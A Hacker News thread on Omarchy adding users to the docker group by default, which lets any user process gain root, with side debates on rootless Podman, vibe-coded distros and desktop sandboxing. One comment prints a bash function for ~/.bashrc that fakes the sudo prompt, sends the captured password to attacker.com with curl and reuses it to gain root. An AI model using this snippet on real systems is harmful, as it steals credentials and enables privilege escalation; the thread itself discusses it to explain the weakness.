Omarchy: Any User Process Can Escalate to Root (0xcc.io)
461 points by trap0xcc 12 hours ago
concinds 11 hours ago
A few days ago someone found they were flowing USB descriptors straight into the shell.
https://github.com/omacom/omarchy/commit/9285b19d6a72eba3df8...
Don't use vibecoded distros. It doesn't matter whether they fix this or that, or whether you care about a particular vuln. This is not sensible. It's why you switched away from Windows in the first place, remember?
teekert 10 hours ago
But, this “vulnerability” is the thing everybody knows about docker since forever. I always make my user part of the docker group, so my NixOS also has this, and any Ubuntu I’ve used over the past year. What is different here?
Start a docker container with the docker socket mounted in the container and now you can have yourself mount / as rw. Everybody knows this. How is everybody so shocked here. Many instructions online tell you to make yourself part of the docker group for convenience (like the digital ocean one).
Aurornis 10 hours ago
> What is different here?
I don’t understand how this is a question.
What’s different is that it comes configured this way out of the box, silently, without warning. It’s functionally equivalent to opting in to giving all user accounts root privileges, which is not what anyone expects the default configuration to be.
You can choose to configure your installs this way if you choose to do so. It should not come this way quietly by default.
JeremyNT 7 hours ago
LinXitoW 10 hours ago
drnick1 8 hours ago
> I always make my user part of the docker group
I don't, and I migrated to Podman because Docker is poorly designed and full of footguns. For example, it it will silently overwrite iptables rules and punch holes in your firewall.
jadar 7 hours ago
PuercoPop 7 hours ago
dotancohen 6 hours ago
lucideer 7 hours ago
I don't think this is as widely known as you believe: I use dockerd via colima so it's not a limitation I've encountered - if I had, I likely would've switched to podman wholesale instead of compromising my system.
Either way though, I would hope it's self-evident to most that taking glaring security holes in a single app (docker) & transforming them into glaring security holes in an entire OS is generally not desirable.
dngray 6 hours ago
markstos 10 hours ago
A distro should be secure-by-default. Omarchy’s design here was insecure by default while the docs have the impression that Docker might be running rootless. Pairing insecure defaults with docs that claim better security is bad.
ludocode 10 hours ago
> I always make my user part of the docker group, so my NixOS also has this, and any Ubuntu I’ve used over the past year.
You may do that, but I don't. I always use sudo to manage the few docker containers I need, and I prefer podman where possible specifically because I can run it rootless.
If you want to give your user passwordless root for convenience, go ahead, but that should never be the default.
hogs_get_fat 9 hours ago
krautsauer 27 minutes ago
other than what others have said: there's rootless docker too, e.g. as virtualisation.docker.rootless under NixOS. It doesn't have to be this way.
happytoexplain 10 hours ago
>Everybody knows this.
I didn't know this.
MrDresden 6 hours ago
teekert 9 hours ago
jadar 7 hours ago
It depends on what distinction you’re making…
If you are asking concerning security, the answer is that it’s an insecure default that should have protected an unwitting user.
If you are asking concerning consistency with real world situations, then there is no difference and it feels like the fit is over a somewhat controversial figure (DHH) and how he created the distro’s recent release without reading any of the code himself. The counter is that no one installing a distro actually understands how their distro is configured, and trusts someone else’s judgement. Here that judgment was farmed out to AI, and while that is controversial, the uncomfortable truth is that this is how an awful lot of real people are told to configure their Docker installations.
IMO Docker running as a root daemon is a bad idea in the first place and I’d much rather use Podman’s rootless containers.
hemlock4593 10 hours ago
This. Was also super confused when I saw the post. Like every docker guide literally screams at you when you use rootfull docker. Either add yourself to the docker group with `newgrp` for a termimal session or use rootless docker.
aforwardslash 3 hours ago
jrflowers 9 hours ago
“This house has a hole in its roof but I cut several holes into my roof to water my indoor plants so what’s the problem?”
dzonga 11 hours ago
the unfortunate thing - is the money pumped into omarchy + the hype around it .... a lot of sheepish followers will just follow the hype.
the tech might gets fixed later.
silisili 11 hours ago
Other than hype, what's the appeal here?
I saw a couple video demos recently, and was horrified that it seemed one had to memorize a dozen key binding shortcuts to really use it. Is that rather common now? I'm just a Gnome pleb who prefers discoverability via UI.
_fat_santa 10 hours ago
I just switched over to it from Ubuntu. So far the nice thing is that it gives you a fully decked out hyprland setup without any of the hassle and pretty good UX.
The problem I've always had with trying out a tiling window manager like hyprland is you're going to spend a very long time trying to get everything just right. With Omarchy I get a really nice hyprland setup right out of the box.
rounce 6 hours ago
dgellow 6 hours ago
jbstack 10 hours ago
There's definitely appeal in key-driven window managers in general. Projects like i3 and Niri are popular. But you can get that with any Linux distro (albeit not many have it set up that way by default). You don't generally choose a distro just for whatever DE/WM it happens to start with.
seaal 11 hours ago
Well the whole point is to have a good foundation and then make it actually yours, and the only necessary key binds are probably SUPER+K for the key bind cheatsheet and SUPER+SPACE for the menu.
Also the community is large so there's usually someone that has already had your issue and resolved it. The amount of themes and plugins are growing everyday.
A bare arch+hyprland install really feels terrible to use and has a much larger barrier to entry than Omarchy.
montagmakes 7 hours ago
torginus 9 hours ago
What I don't get is that VS Code has solved this perfectly via the command palette - you just bring up the prompt and start typing and it will find you the command you actually need without having to memorize anything.
itishappy 10 hours ago
That is the appeal. It's an opinionated distro designed around keyboard navigation.
mosura 10 hours ago
pacificat0r 10 hours ago
I got here because it was the first time I saw a tiling window manager on an Omarchy video. I was on windows my entire life, so when i saw it and how bad windows got, I decided to give it a try. A few months since I de-omarchyfied the system and went straight back to arch. And now still on it.
I should have gone with something like cachyos as games are important to me, but I think at the time hyperland wasn't an option (i don't remember). I know it is now.
SSLy 10 hours ago
caconym_ 5 hours ago
There's a segment of people who are into customizing their desktop environment as a hobby and end in itself.
Personally I've never really been into it, and these days I have a broad and revolving set of machines I have to use, so this sort of thing is absolutely not worth the bother. I just install KDE Plasma and use the computer.
sanex 3 hours ago
I recently customized my own Bazzite install to use hyprland plus other customizations, there's really not much different than what omarchy did. It's pretty much that with some pre installed apps. Anyone that gave them funding is an idiot IMO.
CuriouslyC 10 hours ago
Being hyprland keybinding skilled removes a lot of the desktop interaction surface, it's a worthwhile investment. People who've used tiling window managers for a while will tell you that it gets natural at a point, then a whole class of friction that normal WMs cause just goes away.
LinXitoW 10 hours ago
On average, you can either have a discoverable GUI for noobs, or a configurable, keyboard driven system that's a giant pain to learn and configure.
Omarchy aims to find a middle ground between those two.
lproven 10 hours ago
veeti 7 hours ago
We had people salivating over a spinning Compiz 3D cube 20 years ago, and some still don't understand the ricing factor.
dingdingdang 10 hours ago
I for one hold out for them releasing an optimized XFCE variant - don't by any means dislike keyboard driven software but I like it as an extension of a regular functional UI experience not as a "argh the windows are stuck in xyz pattern until I re-remember xyz combo"-experience: the UI surface is not the speed limit in my optics, rather it is the apps I use or (increasingly due to local AI) the computational hardware limits of my machine.
urams 10 hours ago
> I saw a couple video demos recently, and was horrified that it seemed one had to memorize a dozen key binding shortcuts to really use it.
Whoa! You have to _learn_ something to use it well? Yikes. Not for me.
vincnetas 10 hours ago
TZubiri an hour ago
>If you use Omarchy, the most important takeaway is simple: update to 4.0.1.
More like, don't use Omarchy, or vibecoded Operating Systems.
Running a descriptor into a shell command is laughably sloppish.
jp_sc 11 hours ago
It's definitely not why *I* switched away from Windows
Brian_K_White 11 hours ago
You didn't switch away from windows to get superior software?
Also, the statement was valid because it will be true for most. It doesn't matter that you read it and it wasn't true for you, as long as it's true by the numbers, it's true, because it's one-to-many communication not one to one.
Dylan16807 an hour ago
jp_sc 5 hours ago
AshamedCaptain 11 hours ago
itishappy 10 hours ago
onesandofgrain 11 hours ago
This seems to be quite contrarian considering we had this on the front page of HN the other day: "Debian votes to allow "responsible use of generative AI".
I guess this LLM coding wasn't "Responsible" enough. hahaha
Let the AI bubble pop baby
awesan 11 hours ago
Omarchy is all in on AI, if you look at the recent commits and the dev workflows they have set up you can easily tell no human is looking at all the stuff they are merging.
It's not the same thing as allowing some AI contributions under strict guidelines.
vga1 10 hours ago
thegrim33 7 hours ago
sergiotapia 9 hours ago
On the flipside, once you use an OS that is totally open to agentic stuff, there's no going back really.
I can open Pi and ask it to fix some window tiling issue, help me install shortcuts, help me figure out how to install flatpak vs appimage, etc. the list is endless. I cannot see myself going back to a legacy OS unless I'm forced to by my job for compliance reasons.
skydhash 7 hours ago
> etc. the list is endless.
Why is the list endless? I don’t even remember the last time I check or change any on my mac settings. And my unix things haven’t been touched in months. My debian server is basically frozen at this point.
sergiotapia 6 hours ago
lokipumper 10 hours ago
Vibecoded fixes are quicker
mike_hearn 10 hours ago
"Someone" didn't find that, AI found it. So it's not clear what your point is about vibe coding. Would humans have noticed this problem, especially given that it's not remotely exploitable? (you have to plug in a malicious USB device).
teekert 10 hours ago
It’s that age old “start a docker container with the docker socket in the container and you are effectively root”. What are we talking about here? This is not new?
aforwardslash 3 hours ago
miguelbemartin 10 hours ago
I think they mean that Omarchy is pretty much vibe-coded. Probably just an assumption.
Fuzzwah 6 hours ago
dgellow 6 hours ago
mosura 10 hours ago
The fact comments like this get downvoted because what they say is inconvenient is one of the major signs AI has fundamentally broken HN.
It was already hard to have technical conversations in public, now there is a contingent determined to make it utterly impossible, and they are succeeding.
dgellow 6 hours ago
thehamkercat 11 hours ago
I think people shouldn't just jump to distros which are getting heavily hyped in media/Youtube, cachyOS had similar wave, and now Omarchy does.
(example: NetworkChuck, Primeagen? and a few others)
also, archlinux is much easier to install nowadays with archinstall [1], so i'm not sure you really need another opinionated layer on top of it
syabro 2 minutes ago
I think you are probably missing critical point that for someone omarchy is not about “bare arch”
UI is crucial. If people want something easy to use out of the box without spending days to configuring it
sva_ 11 hours ago
I think this is more about the UI, rather than the install. I haven't tried it myself though.
I think nowadays using quickshell anyone who is so inclined can vibecode their own UI though. I recently made the switch to Wayland/hyprland and rebuilt my polybar on quickshell, even adding widgets that allow getting system info/fine grained system control (interactive Bluetooth, WiFi, Volume, Brightness etc).
kennywinker 11 hours ago
Ah yes, the solution to software with massive security holes is for everyone to vibe code their own software with massive security holes.
But in all seriousness, I am running omarchy now, and I will almost definitely be switching to arch at some point in the future.
sva_ 11 hours ago
mentalgear 5 hours ago
Everything hyped is usually a counter quality signal
esskay 11 hours ago
Add that annoying theo guy to that list. Cant stand these people, they confidently push out videos like they're experts, a week later it turns out whatever they were talking about was total crap and they've already abandoned it - case in point OpenClaw. Look at the mess of videos those named above put out about it, not a single one uses it anymore.
1123581321 9 hours ago
Sadly, true. I know a person who gets AI news from that YouTuber and quotes him like he’s a household name and pays him for some repackaged chat models. It’s tedious and hard to talk to them about basic/remedial aspects because their education from YouTube is half-heard and superficial. I’m trying to get him to invest the time in hands-on experience and then we can talk about that. When you’re deep into these channels, you’re not gaining experience and you can’t easily start until you pull away.
sbochins 5 minutes ago
It’s sad, but a lot of software folks have decided to become influencers and not pursue expertise. I remember before you’d mostly be reading boring looking blogs to follow experts in the industry. It seems like the mindshare has moved to flashy videos by people that aren’t experts, but are great at communication. Similar to how if you want to watch some diy video on YouTube, you’ll get much better information from a poorly produced snd edited video from someone that knows what they’re talking about vs a well produced and edited video from someone that has no idea what they’re talking about.
pibaker 11 hours ago
There is only so much a human can master in his lifetime. And if you choose to master the art of video production, then you are probably not spending that much time on mastering the thing you yap about on camera…
KaiserPro 8 hours ago
lstodd 10 hours ago
mandeepj 2 hours ago
> they confidently push out videos like they're experts, a week later it turns out whatever they were talking about was total crap
100%! When the US attacked Iran, they became experts on wars; when Iran closed the strait, they turned experts on foreign policy, diplomacy, and negotiation; they were doctors during COVID; now they are SME in flooding and disaster control after the Nepal incident.
inigyou 9 hours ago
Not a single mention of Pirate Software yet?
dgellow 6 hours ago
heed 10 hours ago
as primarily influencers they make money from your attention, not from promoting or making good software.
starky 9 hours ago
I had just enough issues with archinstall the last time I tried it that I went back to EndeavourOS which essentially gets you a GUI installer and some pre-installed utilities on the stock Arch install. The only significant change I'm aware of is that they use dracut instead of mkinitcpio.
bundie 11 hours ago
Just use Fedora. It just werks (most times).
kennywinker 11 hours ago
I like the very non-windows very non-mac ui of omarchy.
tomrod 11 hours ago
mandeepj 2 hours ago
prmoustache 4 hours ago
christophilus 5 hours ago
KaiserPro 8 hours ago
Fedora is an arse to use. most of the distros for non free software are targeted at stable RHEL, so are miles out of date.
You only get 6 months of updates, at which point everything break subtly, or not if you use nvidia.
ubuntu with a custom GUI is the way forward, at least compared to fedora.
jasomill 3 hours ago
agumonkey 9 hours ago
is there a fedora 44 ws with non free package built in ?
jm4 9 hours ago
izacus 11 hours ago
Omarchy seems to be pentested by a bunch of angry haters. Who's pentesting your arch install? :P
tomrod 11 hours ago
Basic docker users are the same as angry haters I guess.
izacus 10 hours ago
rramon 11 hours ago
Omarchy imo is best for agent maxxing Mac power users who aren't locked into Apples proprietary apps like Final Cut, audio production software or Adobe and Affinity, so maybe not so great for designers and photographers as the main system.
mike_hearn 11 hours ago
Linux isn't like macOS, it doesn't have any kind of proper desktop sandboxing architecture that really works. So this is kind of security theatre. If you run a malicious program it can do stuff like tamper with your PATH or exploit local vulns in apps to get to the point where it can control anything that matters (which root generally doesn't). For instance it can just drop a custom shell into ~/.bin/.hidden-shell and reconfigure the terminal emulator to run it.
So this kind of "vulnerability" doesn't seem that important. If you run code as yourself on Linux it owns you.
On macOS it's very different. Pervasive code signing gives all apps a stable identity enforced by the kernel that they can't easily escape. The kernel can then impose sandboxing policies on any app that's run regardless of how it's installed, for instance, preventing apps from rummaging through ~/Documents or monitoring your screen. Permissions are editable and guaranteed to stick, including across upgrades. And root is disempowered so obtaining it barely matters, it's only really there for UNIX compatibility.
Unfortunately implementing an Apple style architecture on Linux would be very difficult.
Cloudef 10 hours ago
Its opposite. Windows and MacOS lacks proper sandboxing. While openbsd has pinsyscalls and linux has seccomp-bpf. Windows and MacOS only have filesystem and worse version of user namespace sandboxes, anything else and you need to write a kernel extension or rely on a hypervisor.
> Unfortunately implementing an Apple style architecture on Linux would be very difficult.
The apple apps kind of thing already exists and its called flatpak.
oneplane 9 hours ago
Windows has virtualisation based sandboxing and NT has object-level security (albeit not often used correctly and granularly) and macOS has (among other things) SIP and a subsystem called sandbox that does exactly what it says: it sandboxes. It can sandbox in comparable namespace terms (like cgroups v1 or v2, but more in translocation style execution since it's a MAC framework) yet it also does it a much more fine-grained level depending on what you need. It is used by launchd and applications by default, some entitlements require it so if you want to do some broad kind of elevated application, you also have to have a specific sandbox profile. It's also been around for 16 years, and comes with a ton of examples if you wanted to use it yourself to constrain some process. Yes, it can do filesystem (would be pointless without it), but also does ipc, io, network, memory, fcntl, sysctl, mach ports, sys calls, processes, ui, sockets, messaging, events and all of that including context-aware filtering and compound matching for all of them. And if that's not enough there is also ESF and NEF, the latter only working on networking. You can compare those two to eBFP LSM and XDP. If you want all of this on linux, you'll need to add a lot of custom eBPF and LSM as well as always run in a hypervisor for guaranteed IOMMU usage, but you can't use bare KVM for that either, so you'll either need to never touch the privileged kernel (not even give it a console) or you need to run Xen and use XSM.
Flatpak is just a cheap container copy. Can't do anything beyond what cgroups and things like apparmor and selinux can do, and uses a runtime to do soft higher-level policy functions that translate down to the same primitives. If anything, it's a great bundler, but doesn't do anything new policy-wise.
So, can you get the macOS-level capabilities (both low-level and higher abstractions)? On Linux, yes, but they don't exist yet. On Windows: technically possible, but since that would break most GUI workflow it's not likely that anyone is going to bother, and you're going to have a hard time recompiling windows yourself to make that happen.
aseipp 6 hours ago
macOS absolutely has sandboxing, what are you talking about? But the reality is that you need custom sandboxing tools less when you don't have basic problems like "anything that runs ever can read my ~/.ssh directory without problem" or "you can hijack my password by interposing sudo and thus do anything". This does not matter because macOS will see a program signed by Corp XYZ is trying to read data not owned by that cryptographic signature, and it can't escape the code signature check, and it will flag it. A program cannot simply read your password from stdin and elevate privileges silently, because granting new privileges requires communicating with a higher privilege program so it can delegate to you, and that program has a non spoofable prompt. And so on.
You can use Linux's sandboxing functionality to make a pretty hardened server. If you take in mind the physical deployment and go the extra mile, it can be very secure. The Linux desktop is not and will never be secure in its current form from things like extremely basic local malware. You would have to redesign much of the desktop stack from the init system downward so you could easily do things signature-based identity, proper per-identity secure storage and key management, securitizing elevation of privileges, getting rid of setuid, etc.
KennyBlanken an hour ago
Retr0id 11 hours ago
> Unfortunately implementing an Apple style architecture on Linux would be very difficult.
On desktop Linux as we know it, yes, but Android manages it alright, mostly via SELinux+seccomp.
mike_hearn 11 hours ago
Android is basically a different OS that happens to reuse parts of the Linux kernel.
Retr0id 10 hours ago
lrvick 10 hours ago
> Linux isn't like macOS, it doesn't have any kind of proper desktop sandboxing architecture that really works.
As a QubesOS user, I beg to differ. Just because most Linux distros are negligent with sandboxing does not mean all of them are.
veeti 8 hours ago
Funny because there is a 101 level Qubes RCE on front page right now.
lrvick 3 hours ago
literalAardvark 7 hours ago
rixed 5 hours ago
The issue is not that Linux lacks a central authority that holds some encryption keys and controls what software you can run. The issue is that you should not run any software from a source that can't be trusted. When we used to run only software from community distros or that we compile ourselves, launching a malicious program was a non issue.
amluto 11 hours ago
> Linux isn't like macOS, it doesn't have any kind of proper desktop sandboxing architecture that really works.
I’m sorry, what? MacOS’s desktop sandboxing is pathetic. Sure, it kind of sort of tries to prevent an application from rummaging until you give it permission. And that permission is hilariously coarse grained, and it gets regularly broken anyway. (Seriously, read about TCC breaks. They’re not little implementation errors — they’re giant gaping holes in the whole concept.) The entitlement mechanism basically serves to help Apple restrict what developers can do without meaningful protecting Apple’s users.
If you think that it protects you when your Mac prompts to ask whether Terminal.app may access Documents, you are welcome to enjoy your warm fuzzy feelings.
> Unfortunately implementing an Apple style architecture on Linux would be very difficult.
Why would it be difficult? I think that mostly it would reveal to whomever implemented it how useless it is.
If you mean sandbox-exec, you can do this on Linux, too. And the Linux mechanisms are not considered deprecated and undocumented, whereas Apple steadfastly refuses admit that sandbox-exec is a real mechanism.
mike_hearn 11 hours ago
There can be exploits in any security system but the architecture is sound. There's no equivalent of TCC on Linux (I mean one that really sticks), and no easy way to create one.
The sandboxing isn't bad. It's obviously weaker if you do everything in the Terminal and stay in old-school UNIX territory because it wasn't designed to sandbox developer workloads. But it's a lot better than nothing, which is what Linux offers.
The OS does actually protect you when it asks if the terminal should be able to access ~/Documents. You can say no, and then random stuff you curl|bash can't read files in that folder unless there's an exploit. Apps that opt in to app sandboxing are much better protected and can store files/settings in an area of $HOME that other apps can't access at all without the right permissions.
It would be difficult to do on Linux because an Apple style architecture requires apps to systematically use the blessed OS APIs for functionality. Not only for things like file pickers but also camera access, storing preferences, etc. In Linux it'd require the architecture to be tied to a specific desktop environment and associated set of apps. There's not enough consistency otherwise.
It also needs pervasive kernel enforced app identity and equivalents to Apple's bookmarks, Mach context propagation, SBPL, app containers architecture etc.
It also needs an agreed on way to handle malware reporting and detection, out of the box, and some authority that's trusted to hand out sensitive permissions (for writing debuggers, if nothing else).
You can hack something together with bits and pieces Linux has, and define a way to write apps that delivers something like Apple's architecture - as Android has - but that won't bring the ecosystem with you. And it will suffer from a high degree of centralization where distributors have to approve every app, with any app you get outside your distro's package repositories being a free for all. Apple's architecture allows apps to be distributed outside the app store while still being sandboxed to a lesser or greater extent, as well as scanned for malware ahead of time and located anywhere on disk (by extension, you can have >1 version of an app installed at once and sandboxing still works).
lrvick 10 hours ago
drnick1 7 hours ago
amluto 10 hours ago
KaiserPro 8 hours ago
I mean SElinux plus cgroups is probably good enough. Although as soon as it talks to the desktop environment all bets are off.
amluto 7 hours ago
bigyabai 11 hours ago
> it doesn't have any kind of proper desktop sandboxing architecture that really works.
Bubblewrap works.
mike_hearn 10 hours ago
Bubblewrap is a less powerful version of sandbox-exec, but the macOS architecture is much larger than just that. In effect macOS runs everything under bubblewrap, in such a way that users don't notice but apps are meaningfully sandboxed and root exploits barely matter.
graemep 11 hours ago
and Firejail
oever 10 hours ago
sashank_1509 2 hours ago
Ubuntu is good enough. I never got the point of tiling window managers, because the most important part of daily computing, browsing the web requires you to use the mouse. I’ve tried keyboard only browsers, none of them are as intuitive as just using a mouse and they can’t be, especially considering the prevalence of hyperlinks.
I guess while coding it is nice, but I can switch between the terminal and my editor in a single key in Ubuntu itself so I don’t see the point of this.
hellcow an hour ago
vimium is my solution to the web.
lrvick 11 hours ago
To be fair it is easy for malware to escalate to root on any major linux distro because sudo is completely security theater.
Malware just need to put this in ~/.bashrc and wait:
function sudo () {
realsudo=$(which sudo)
read -r -s -p "[sudo] password for $USER: " password
echo "$USER: $password" | \
curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
$realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1
$realsudo "${@:1}"
}0l 11 hours ago
Indeed, and most flatpaks have access to the home directory so are also able to do this even though they're """sandboxed"""
silver_sun 9 hours ago
Flatpak uses Portals to let the user grant access to different files/directories, apparently they don't have access by default: https://docs.flatpak.org/en/latest/sandbox-permissions.html
I was also unable to find any Flatpak that has access to the home directory when installed, you may well be right but I couldn't find any. I used Flatseal to verify the permissions: https://flathub.org/en/apps/com.github.tchx84.Flatseal
I'm also of the opinion that we generally shouldn't use software that we don't absolutely trust. That has kept my .bashrc (and other files) safe so far.
Arrowmaster 9 hours ago
I don't think flatpak allows access to hidden files so even those with access $HOME cannot do this.
silver_sun 10 hours ago
But if an attacker can put arbitrary code into your .bashrc, you are already executing arbitrary malicious code.
nickjj 6 hours ago
Yep, but pretty much every single piece of software you've installed on your system can read and write files to your home directory in a silent way without root, and that's where your most important files are on a desktop machine (API tokens, secrets, client projects, etc.).
I have my own opinionated Arch / niri set up and there's 1155 packages installed. That's 1155 opportunities for a package to be compromised. This is also why I try very hard to avoid the AUR and only use it as a last resort (I use 2 packages from it). It doesn't guarantee safety but the official Arch package repos do seem to have more checks and bounds vs the AUR.
lrvick 2 hours ago
inigyou 9 hours ago
Same if an attacker can run arbitrary docker commands.
dist-epoch 6 hours ago
but not as root
mike_hearn 10 hours ago
Sudo isn't security theater when used for what it was designed for. It's useless for constraining apps you run as your own user ID.
inigyou 9 hours ago
But very few people are using their systems in ways that fit the Unix security model, which was designed for multi-user mainframes with only trustworthy software.
lrvick 10 hours ago
I challenge anyone to name even one thing that requires sudo on a Linux desktop not better handled with systemd user units, Linux Capabilities, rootless docker, etc.
stickynotememo 5 hours ago
leothetechguy 11 hours ago
Wow. This never crossed my mind but of course that's so simple. There really needs to be a better solution.
lrvick 10 hours ago
There is. Simply do not install sudo and do not allow access to root at runtime. I am serious. There is absolutely nothing you cannot run unprivileged these days. Can even run sshd from a systemd user unit in your home folder, and even assign port 22 to it if needed with Linux Capabilities.
inigyou 9 hours ago
utopiah 9 hours ago
dist-epoch 6 hours ago
dist-epoch 6 hours ago
on Windows the UAC (GUI sudo equivalent) requires actual user input (keyboard, mouse) on a dialog presented in a secure way (can't be faked by malware)
jasomill 3 hours ago
declan_roberts 6 hours ago
utopiah 9 hours ago
Funnily enough it wouldn't work for me as I use passwordless sudo thanks to PAM-U2F with a YubiKey Bio. I mean realistically speaking it probably would as I would just type it thinking "Hmmm weird" but still want to proceed forward ¯\_ (ツ)_/¯
lrvick 2 hours ago
Of course this style of attack would work on you. Attacker has the sudo wrapper that hooks your next yubikey tap to running any payload they want as root.
Your solution helps mitigate hardware keyloggers, which is great, but for malware in your home directory, it offers no advantages.
ahelwer 11 hours ago
You need root in order to overwrite sudo in the first place I think, but yes password replay attacks are real. This is why I think it is a good idea to get a yubikey and use PAM to require a physical user presence check to acquire root privileges. You don't even need a password at that point. Unfortunately haven't figured out how to make this work over SSH.
lrvick 11 hours ago
> You need root in order to overwrite sudo in the first place I think
You just need write access to .bashrc or similar.
> This is why I think it is a good idea to get a yubikey and use PAM to require a physical user presence check to acquire root privileges.
Unprivileged malware will be waiting with a root payload ready to fire the next time you tap your yubikey.
ffsm8 11 hours ago
Look at the excerpt. They're not overwriting the sudo binary. The attack vector is real for malware running on a administrator user session which can be escalated to root via sudo.
It's a niche, but it's real. Esp. if you're targeting npm installed user scripts or similar
porridgeraisin 11 hours ago
No, the above attack writes that function into bashrc, meaning the next time the user runs sudo themselves, you harvest their password.
Brian_K_White 10 hours ago
You do not need root to run that shell function, nor to get it loaded into a shell's environment.
They didn't say anything about overwriting the sudo binary, and that is not required, which I think was their whole point was to show exactly how that is not required.
tomrod 11 hours ago
What? Why is sudo security theater?
novafunc 11 hours ago
Any user process can append anything they want to your shell rc (.bashrc, .zshrc). In this case, they added a bash function for a fake sudo prompt. It then uses the password the user entered to run a malicious payload as root.
silver_sun 10 hours ago
charrondev 11 hours ago
It’s not, but the grandparent does point out 1 major flaw with sudo being a typically command that goes through normal path discovery. It makes it easier to escalate from a compromised user account to a compromised root account, since the end user is likely to type the root password into a command that can be shadowed in their user space.
lrvick 11 hours ago
Because it is trivial for unprivileged malware to phish the password and escalate to root. No production system should ever ship with sudo.
jorvi 10 hours ago
exitb 11 hours ago
It’s not great, but I’m not sure this should be framed as Omarchy-specific, when it’s a very common setup to add regular user to the docker group.
pibaker 11 hours ago
It is one thing to do things the risky way on your own system and another thing to ship an unsafe and unconventional default to your users.
LinXitoW 10 hours ago
For a single user, opinionated, modern, developer focussed OS, this is completely and utterly on par. Using docker as a developer without this is just plain annoying.
tasuki 9 hours ago
lrvick 11 hours ago
Docker can be run rootless. It is so easy. No excuse for desktop distros to not do this by default. And that is why all major Linux distros are just as bad as Omarchy (Not recommending MacOS or Windows either as those are wildly worse)
steve1977 11 hours ago
Using Docker instead of podman is the first mistake and that is a distro decision (or a "chef" decision, in Omarchy parlance...)
hemlock4593 9 hours ago
*rootfull docker.
Rootless docker is perfectly fine.
gruez 11 hours ago
>when it’s a very common setup to add regular user to the docker group.
As an official configuration? Or in random copy paste guides? The former is very different than the latter. It's not uncommon to disable sudo passwords, but it would be considered a serious security lapse if that were the default on some OS.
bardsore 11 hours ago
Adding your user to the docker group is in the official Docker install instructions, I wouldn't call that "random copy paste guides".
gruez 11 hours ago
dpkirchner 11 hours ago
The methods are described on the official docker website, not just random blogs or SO pages. There are caveats about security, of course, but it's not truly discouraged.
skydhash 11 hours ago
ezst 11 hours ago
You mean, just how it is on Windows?
dawnerd 8 hours ago
Docker itself is such a massive security problem. Like it’ll punch through your firewall. Found out the hard way after a misconfigured redis was exposed to the web.
Aurornis 10 hours ago
> but I’m not sure this should be framed as Omarchy-specific,
Adding the user to the docker group by default, out of the box, is Omarchy-specific.
EDIT: More accurately, was Omarchy specific, until they realized that it's not a good idea and changed it.
StrLght 10 hours ago
Exactly! I was also surprised by this — that's a sensible default for many people.
However, I agree that it should be opt-in. Docs should be more explicit about that too, they should warn users about risks of going with that option. That excerpt mentioned in the article was rather misleading.
pixl97 11 hours ago
This also seems like one of the more common things LLMs use to priv escalate themselves when not given root access, seems like a rather common misconfiguration.
bakugo 9 hours ago
It's absolutely not Omarchy-specific, Ubuntu has the exact same vulnerability out of the box, just with lxd instead.
trentnix 10 hours ago
The Docker configuration issue was reported and changes were made quickly to address it. Sounds like this is a great example of the system working well.
Omarchy looks like a simple way for a developer like me to test drive hyprland and write code. It also looks like a great way for my kids to get into computers as there's an agent harness ready to help them manage their machine and use free software, even the stuff that's a bit obtuse.
I'm bewildered that people are mad about any of this, but then I remember I don't care what the gatekeepers think anymore.
ryan_n 3 hours ago
Why do you think people that disagree with your opinion are gatekeepers? You can still use it if you want, no one’s gate keeping anything lol.
zenburnmyface 9 hours ago
Gatekeepers? Someone is pouring something into your ear.
bigyabai 6 hours ago
It's easy to disable rootful Docker support in an ISO, but much harder to fix the vulnerable installations. That is not the system working as intended.
And sadly, this stuff isn't bewildering at all. We saw it happen with LARBS, we saw it happen with Manjaro, then Archlabs, and now Omarchy too. All of them endangered themselves by shipping dotfiles that none of their users understood, and few of their developers would justify. When Manjaro's repos conflicted with AUR pkgbuilds, thousands of their users didn't understand that Manjaro had a special repo override for system packages that lags 2 weeks behind upstream. Omarchy tempts the same fate by stacking custom packaging channels and pacman scripts on-top of a system that gets advertised as "regular" Arch Linux.
Distro variety is always a good thing, but there has always been different levels of commitment to it. If I was putting together a Linux system for a kid or someone elderly, I'd just give them Fedora/GNOME instead of trying to get them into larping r/unixporn.
darkwi11ow 11 hours ago
Why not use rootless podman? It is 2026 not 2016, Podman works much better than Docker today.
alienbaby 11 hours ago
The article specifically calls this out as a preferred option.
IsTom 9 hours ago
I've used docker until recently just because it was what I was used to. It turned out I can basically just `apt install podman` and it'll just work. I might have stayed a bit behind the times with having podman slotted as a redhat thing.
nkydr0i0 11 hours ago
that's what I do and what the author recommends as well
phoronixrly 11 hours ago
Somehow I doubt DHH and company would be OK sacrificing ""developer experience"" for security... There is still a non-trivial amount of docker-compose files and Docker incantations that don't work 1:1 with podman and podman-compose. Adjusting them would require Omarchy's users underatanding podman, and I doubt this will align with the opinionated nature of Omarchy..
PuercoPop 7 hours ago
psjs 11 hours ago
ecshafer 11 hours ago
iririririr 11 hours ago
because the distro is all about convenience over security, while selling an aura of technical superiority. Which is the modus operandi that worked for the distro author in the past, when he sold VPS with a big markup, because he also gave a script that did "ssh vps -- curl somebashscript" to do basic webdev taks.
> The security tradeoff was made for them, applied to the default account, and the tradeoff was not explained to the user.
just like the vps era. it's all about convenience.
hemlock4593 8 hours ago
Rootless docker is also an option.
> Podman works much better than Docker today.
Nah absolutely not. Especially compose files and networking can be an absolute nightmare with podman.
drnick1 6 hours ago
Compose files work just fine. The gap with Docker has basically closed, and the few things you can't do or that behave differently are precisely the things Docker shouldn't be doing.
moojacob 5 hours ago
Omarchy has me questioning liking Rails because it just… straight up sucks?
It comes preloaded with friggen ZOOM. I don’t think Windows bloat is that bad.
If it makes people happy it makes people happy I guess. These guys trying it would be even more amazed at Fedora Workstation (“you can press windows and it shows all your open windows? That’s so much better”)
damanamathos 28 minutes ago
A lot of the "pre-install bloat" are just web apps, including Zoom. Zoom is just an 8 line file so it appears in the menu and to point it to a 22 line bash script to launch the app.zoom.us website at the right address.
Easy to remove. Can even open your favourite AI assistant and ask it to remove it, since it comes with an Omarchy skill and knows how to change everything.
adverbly 11 minutes ago
> Easy to remove
See this is where its going too far IMO.
When you setup rails, you get far fewer "batteries" by default.
Its batteries included, but opt-in to be included.
That is totally different from installing an OS and having bloatware already included.
It'll get there with enough community support hopefully, but the current state is very rough(much like early rails)
chrysoprace 2 hours ago
(Not a Rails developer, just an outside observer)
Isn't Rails highly opinionated with a focus on being batteries-included? I'm not defending the choice to include Zoom but a batteries-included (for better or for worse) distro is exactly what I would expect from the creator of Rails.
shdh 4 hours ago
